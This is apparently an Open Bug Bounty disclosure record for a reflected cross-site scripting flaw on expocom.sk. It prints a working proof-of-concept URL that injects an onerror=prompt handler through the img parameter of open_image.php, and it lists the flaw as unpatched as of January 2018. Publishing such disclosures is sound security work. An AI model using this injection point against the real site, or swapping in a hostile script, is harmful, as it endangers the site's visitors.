expocom.sk XSS vulnerability

2017-10-12T15:46:00
ID OBB:336440
Type openbugbounty
Reporter M0r3h4x
Modified 2018-01-10T16:29:00

Description

Vulnerable URL:
https://www.expocom.sk/open_image.php?img=xss%22%20onerror=prompt(%27openbugbounty%27)%20%22&title;=Bed%F2a%20na%20ovocie%20a%20zeleninu%20S%20reg.
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 10.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3289153
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 October, 2017 15:46 GMT
Generic security notifications sent to website owner| 12 October, 2017 15:49 GMT
Vulnerability details disclosed by researcher| 10 January, 2018 16:29 GMT